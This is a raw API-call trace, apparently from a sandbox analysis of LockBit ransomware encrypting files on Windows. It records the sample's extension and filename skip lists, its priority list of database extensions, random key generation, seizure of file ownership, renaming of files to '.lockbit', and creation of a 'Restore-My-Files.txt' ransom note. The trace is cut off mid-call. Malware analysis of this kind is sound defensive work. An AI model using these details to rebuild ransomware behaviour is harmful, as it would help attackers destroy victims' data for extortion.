GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.087] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0080.087] ReadFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0080.093] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.093] malloc (_Size=0xb4) returned 0x77d800 [0080.093] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0080.093] free (_Block=0x77d800) [0080.093] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0080.093] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0080.093] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.093] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6edbb2f3, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6edbb2f3, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c53d379, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6a91, dwReserved0=0x520150, dwReserved1=0x0, cFileName="Circle_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0080.094] lstrcmpiW (lpString1=".", lpString2="Circle_ButtonGraphic.png") returned -1 [0080.094] lstrcmpiW (lpString1="..", lpString2="Circle_ButtonGraphic.png") returned -1 [0080.094] PathFindExtensionW (pszPath="Circle_ButtonGraphic.png") returned=".png" [0080.094] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0080.094] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0080.094] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0080.094] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0080.094] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0080.094] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0080.094] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0080.094] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0080.094] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0080.094] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0080.094] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0080.094] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0080.094] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0080.094] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0080.094] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0080.094] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0080.094] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0080.094] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0080.095] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0080.095] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0080.095] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0080.095] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0080.095] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0080.095] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0080.095] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.095] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0080.095] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0080.095] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0080.095] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0080.095] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0080.095] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0080.095] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0080.095] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0080.095] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0080.095] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0080.095] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0080.095] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0080.095] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0080.096] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0080.096] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0080.096] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0080.096] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0080.096] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.096] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0080.096] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0080.096] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0080.096] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0080.096] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Circle_ButtonGraphic.png") returned 1 [0080.096] lstrcmpiW (lpString1="ntldr", lpString2="Circle_ButtonGraphic.png") returned 1 [0080.096] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Circle_ButtonGraphic.png") returned 1 [0080.096] lstrcmpiW (lpString1="bootsect.bak", lpString2="Circle_ButtonGraphic.png") returned -1 [0080.096] lstrcmpiW (lpString1="autorun.inf", lpString2="Circle_ButtonGraphic.png") returned -1 [0080.096] lstrcmpiW (lpString1="thumbs.db", lpString2="Circle_ButtonGraphic.png") returned 1 [0080.096] lstrcmpiW (lpString1="iconcache.db", lpString2="Circle_ButtonGraphic.png") returned 1 [0080.096] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0080.096] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png") returned=".png" [0080.096] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0080.096] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0080.097] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0080.097] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0080.097] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0080.097] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0080.097] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0080.097] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0080.097] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0080.097] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0080.097] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0080.097] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0080.097] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0080.097] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0080.097] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0080.097] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0080.097] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0080.097] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0080.097] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0080.097] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0080.097] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0080.097] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0080.097] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0080.098] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0080.098] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0080.098] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0080.098] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0080.098] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0080.098] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png.lockbit") returned 77 [0080.098] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.099] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.099] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.099] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.099] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.099] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.099] RtlFreeAnsiString (AnsiString="\\") [0080.099] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3b4) returned 0x0 [0080.100] malloc (_Size=0x200) returned 0x77d800 [0080.100] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0080.100] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.100] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.100] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.100] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.101] CloseHandle (hObject=0x3b4) returned 1 [0080.101] free (_Block=0x77d800) [0080.101] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0080.101] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.101] malloc (_Size=0x40068) returned 0x3d70048 [0080.101] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=27281) returned 1 [0080.101] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.102] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.102] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0080.102] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.102] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.102] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0080.102] ReadFile (in: hFile=0x3b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0080.111] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.111] malloc (_Size=0xb0) returned 0x77d800 [0080.111] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xb0, FileInformationClass=0xa) returned 0x0 [0080.112] free (_Block=0x77d800) [0080.112] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0080.112] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0080.112] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.112] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e990cc7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6e990cc7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c7063e1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="circle_glass_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0080.112] lstrcmpiW (lpString1=".", lpString2="circle_glass_Thumbnail.bmp") returned -1 [0080.112] lstrcmpiW (lpString1="..", lpString2="circle_glass_Thumbnail.bmp") returned -1 [0080.112] PathFindExtensionW (pszPath="circle_glass_Thumbnail.bmp") returned=".bmp" [0080.112] lstrcmpiW (lpString1=".386", lpString2=".bmp") returned -1 [0080.112] lstrcmpiW (lpString1=".cmd", lpString2=".bmp") returned 1 [0080.113] lstrcmpiW (lpString1=".exe", lpString2=".bmp") returned 1 [0080.113] lstrcmpiW (lpString1=".ani", lpString2=".bmp") returned -1 [0080.113] lstrcmpiW (lpString1=".adv", lpString2=".bmp") returned -1 [0080.113] lstrcmpiW (lpString1=".theme", lpString2=".bmp") returned 1 [0080.113] lstrcmpiW (lpString1=".msi", lpString2=".bmp") returned 1 [0080.113] lstrcmpiW (lpString1=".msp", lpString2=".bmp") returned 1 [0080.113] lstrcmpiW (lpString1=".com", lpString2=".bmp") returned 1 [0080.113] lstrcmpiW (lpString1=".diagpkg", lpString2=".bmp") returned 1 [0080.113] lstrcmpiW (lpString1=".nls", lpString2=".bmp") returned 1 [0080.113] lstrcmpiW (lpString1=".diagcab", lpString2=".bmp") returned 1 [0080.113] lstrcmpiW (lpString1=".lock", lpString2=".bmp") returned 1 [0080.113] lstrcmpiW (lpString1=".ocx", lpString2=".bmp") returned 1 [0080.113] lstrcmpiW (lpString1=".mpa", lpString2=".bmp") returned 1 [0080.113] lstrcmpiW (lpString1=".cpl", lpString2=".bmp") returned 1 [0080.113] lstrcmpiW (lpString1=".mod", lpString2=".bmp") returned 1 [0080.113] lstrcmpiW (lpString1=".hta", lpString2=".bmp") returned 1 [0080.113] lstrcmpiW (lpString1=".icns", lpString2=".bmp") returned 1 [0080.113] lstrcmpiW (lpString1=".prf", lpString2=".bmp") returned 1 [0080.113] lstrcmpiW (lpString1=".rtp", lpString2=".bmp") returned 1 [0080.113] lstrcmpiW (lpString1=".diagcfg", lpString2=".bmp") returned 1 [0080.113] lstrcmpiW (lpString1=".msstyles", lpString2=".bmp") returned 1 [0080.113] lstrcmpiW (lpString1=".bin", lpString2=".bmp") returned -1 [0080.113] lstrcmpiW (lpString1=".hlp", lpString2=".bmp") returned 1 [0080.113] lstrcmpiW (lpString1=".shs", lpString2=".bmp") returned 1 [0080.113] lstrcmpiW (lpString1=".drv", lpString2=".bmp") returned 1 [0080.113] lstrcmpiW (lpString1=".wpx", lpString2=".bmp") returned 1 [0080.114] lstrcmpiW (lpString1=".bat", lpString2=".bmp") returned -1 [0080.114] lstrcmpiW (lpString1=".rom", lpString2=".bmp") returned 1 [0080.114] lstrcmpiW (lpString1=".msc", lpString2=".bmp") returned 1 [0080.114] lstrcmpiW (lpString1=".spl", lpString2=".bmp") returned 1 [0080.114] lstrcmpiW (lpString1=".ps1", lpString2=".bmp") returned 1 [0080.114] lstrcmpiW (lpString1=".msu", lpString2=".bmp") returned 1 [0080.114] lstrcmpiW (lpString1=".ics", lpString2=".bmp") returned 1 [0080.114] lstrcmpiW (lpString1=".key", lpString2=".bmp") returned 1 [0080.114] lstrcmpiW (lpString1=".mp3", lpString2=".bmp") returned 1 [0080.114] lstrcmpiW (lpString1=".reg", lpString2=".bmp") returned 1 [0080.114] lstrcmpiW (lpString1=".dll", lpString2=".bmp") returned 1 [0080.114] lstrcmpiW (lpString1=".ini", lpString2=".bmp") returned 1 [0080.114] lstrcmpiW (lpString1=".idx", lpString2=".bmp") returned 1 [0080.114] lstrcmpiW (lpString1=".sys", lpString2=".bmp") returned 1 [0080.114] lstrcmpiW (lpString1=".hlp", lpString2=".bmp") returned 1 [0080.114] lstrcmpiW (lpString1=".ico", lpString2=".bmp") returned 1 [0080.114] lstrcmpiW (lpString1=".lnk", lpString2=".bmp") returned 1 [0080.114] lstrcmpiW (lpString1=".rdp", lpString2=".bmp") returned 1 [0080.114] lstrcmpiW (lpString1=".lockbit", lpString2=".bmp") returned 1 [0080.114] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="circle_glass_Thumbnail.bmp") returned 1 [0080.114] lstrcmpiW (lpString1="ntldr", lpString2="circle_glass_Thumbnail.bmp") returned 1 [0080.114] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="circle_glass_Thumbnail.bmp") returned 1 [0080.114] lstrcmpiW (lpString1="bootsect.bak", lpString2="circle_glass_Thumbnail.bmp") returned -1 [0080.114] lstrcmpiW (lpString1="autorun.inf", lpString2="circle_glass_Thumbnail.bmp") returned -1 [0080.114] lstrcmpiW (lpString1="thumbs.db", lpString2="circle_glass_Thumbnail.bmp") returned 1 [0080.114] lstrcmpiW (lpString1="iconcache.db", lpString2="circle_glass_Thumbnail.bmp") returned 1 [0080.114] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0080.115] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circle_glass_Thumbnail.bmp") returned=".bmp" [0080.115] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0080.115] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0080.115] lstrcmpiW (lpString1=".7z", lpString2=".bmp") returned -1 [0080.115] lstrcmpiW (lpString1=".ckp", lpString2=".bmp") returned 1 [0080.115] lstrcmpiW (lpString1=".dacpac", lpString2=".bmp") returned 1 [0080.115] lstrcmpiW (lpString1=".db", lpString2=".bmp") returned 1 [0080.115] lstrcmpiW (lpString1=".db-shm", lpString2=".bmp") returned 1 [0080.115] lstrcmpiW (lpString1=".db-wal", lpString2=".bmp") returned 1 [0080.115] lstrcmpiW (lpString1=".db3", lpString2=".bmp") returned 1 [0080.115] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0080.115] lstrcmpiW (lpString1=".dbc", lpString2=".bmp") returned 1 [0080.115] lstrcmpiW (lpString1=".dbs", lpString2=".bmp") returned 1 [0080.115] lstrcmpiW (lpString1=".dbt", lpString2=".bmp") returned 1 [0080.115] lstrcmpiW (lpString1=".dbv", lpString2=".bmp") returned 1 [0080.115] lstrcmpiW (lpString1=".frm", lpString2=".bmp") returned 1 [0080.115] lstrcmpiW (lpString1=".mdf", lpString2=".bmp") returned 1 [0080.115] lstrcmpiW (lpString1=".mrg", lpString2=".bmp") returned 1 [0080.115] lstrcmpiW (lpString1=".mwb", lpString2=".bmp") returned 1 [0080.115] lstrcmpiW (lpString1=".myd", lpString2=".bmp") returned 1 [0080.115] lstrcmpiW (lpString1=".ndf", lpString2=".bmp") returned 1 [0080.115] lstrcmpiW (lpString1=".qry", lpString2=".bmp") returned 1 [0080.115] lstrcmpiW (lpString1=".sdb", lpString2=".bmp") returned 1 [0080.115] lstrcmpiW (lpString1=".sdf", lpString2=".bmp") returned 1 [0080.115] lstrcmpiW (lpString1=".sql", lpString2=".bmp") returned 1 [0080.115] lstrcmpiW (lpString1=".sqlite", lpString2=".bmp") returned 1 [0080.116] lstrcmpiW (lpString1=".sqlite3", lpString2=".bmp") returned 1 [0080.116] lstrcmpiW (lpString1=".sqlitedb", lpString2=".bmp") returned 1 [0080.116] lstrcmpiW (lpString1=".tmd", lpString2=".bmp") returned 1 [0080.116] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circle_glass_Thumbnail.bmp.lockbit") returned 79 [0080.116] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circle_glass_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_glass_thumbnail.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.116] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.117] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.117] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.117] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.117] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.117] RtlFreeAnsiString (AnsiString="\\") [0080.117] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3ac) returned 0x0 [0080.117] malloc (_Size=0x200) returned 0x77d800 [0080.117] NtQueryInformationToken (in: TokenHandle=0x3ac, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0080.117] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.117] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.118] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circle_glass_Thumbnail.bmp", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.118] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circle_glass_Thumbnail.bmp", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.118] CloseHandle (hObject=0x3ac) returned 1 [0080.118] free (_Block=0x77d800) [0080.118] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circle_glass_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_glass_thumbnail.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0080.118] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.118] malloc (_Size=0x40068) returned 0x2031ed0 [0080.120] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x2031ee8 | out: lpFileSize=0x2031ee8*=5072) returned 1 [0080.120] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.120] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f04, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f04) returned 0x0 [0080.120] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.121] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f14, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f14) returned 0x0 [0080.121] ReadFile (in: hFile=0x3ac, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 1 [0080.128] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circle_glass_Thumbnail.bmp.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circle_glass_Thumbnail.bmp.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.128] malloc (_Size=0xb4) returned 0x77d800 [0080.128] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0080.129] free (_Block=0x77d800) [0080.129] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circle_glass_Thumbnail.bmp" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0080.129] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0080.129] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: 